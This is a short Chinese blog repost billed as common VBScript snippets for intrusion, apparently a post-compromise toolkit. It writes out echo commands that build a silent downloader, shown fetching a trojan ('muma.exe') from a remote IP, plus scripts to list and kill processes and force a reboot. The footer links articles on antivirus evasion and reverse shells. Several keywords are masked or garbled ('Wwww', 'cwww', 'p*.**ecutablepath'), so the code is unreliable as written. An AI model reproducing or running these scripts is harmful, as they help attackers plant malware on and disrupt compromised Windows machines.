入侵常用vbs脚本 建议收藏

简介:
1.文件下载(无回显) 
echo iLocal = LCase(Wwww.Arguments(1)) >iget.vbe 
echo iRemote = LCase(Wwww.Arguments(0)) >>iget.vbe 
echo Set xPost = CreateObject("Microsoft.XMLHTTP") >>iget.vbe 
echo xPost.Open "GET",iRemote,0 >>iget.vbe 
echo xPost.Send() >>iget.vbe 
echo Set sGet = CreateObject("ADODB.Stream") >>iget.vbe 
echo sGet.Mode = 3 >>iget.vbe 
echo sGet.Type = 1 >>iget.vbe 
echo sGet.Open() >>iget.vbe 
echo sGet.Write(xPost.responseBody) >>iget.vbe 
echo sGet.SaveToFile iLocal,2 >>iget.vbe 

用法: cwww hget.vbs http://111.111.111.111/muma.exe muma.exe 


2.列举进程 
@echo for each ps in getobject _ >ps.vbs 
@echo ("winmgmts:\\.\root\cimv2:win32_process").instances_ >>ps.vbs 
@echo wwww.echo ps.handle^&vbtab^&ps.name^&vbtab^&p*.**ecutablepath:next >>ps.vbs 

用法:cwww ps.vbs 


3.终止进程 
@echo for each ps in getobject _ >pskill.vbs 
@echo ("winmgmts:\\.\root\cimv2:win32_process").instances_ >>pskill.vbs 
@echo if ps.handle=wwww.arguments(0) then wwww.echo ps.terminate:end if:next >>pskill.vbs 

用法:cwww pskill.vbs pid 


4.重启系统 
@echo for each os in getobject _ >reboot.vbs 
@echo ("winmgmts:!\\.\root\cimv2:win32_operatingsystem").instances_ >>reboot.vbs 
@echo os.win32shutdown(2):next >>reboot.vbs 

用法:cwww reboot.vbs

















本文转sinojelly51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/338196,如需转载请自行联系原作者

相关文章
|
11月前
|
数据安全/隐私保护
Powershell免杀系列(二)
Powershell免杀系列(二)
258 0
|
安全 Shell Linux
PowerShell攻击指南
PowerShell攻击指南
206 0
|
安全 网络协议 Shell
2022渗透测试-反弹shell的详细讲解
2022渗透测试-反弹shell的详细讲解
2022渗透测试-反弹shell的详细讲解
|
安全 Shell
简单防御黑客DOS攻击shell脚本
简单防御黑客DOS攻击shell脚本
169 0
|
安全 关系型数据库 Linux
linux服务器上使用find查杀webshell木马方法
linux服务器上使用find查杀webshell木马方法本文转自:http://ju.outofmemory.cn/entry/256317 只要从事互联网web开发的,都会碰上web站点被入侵的情况。
1936 0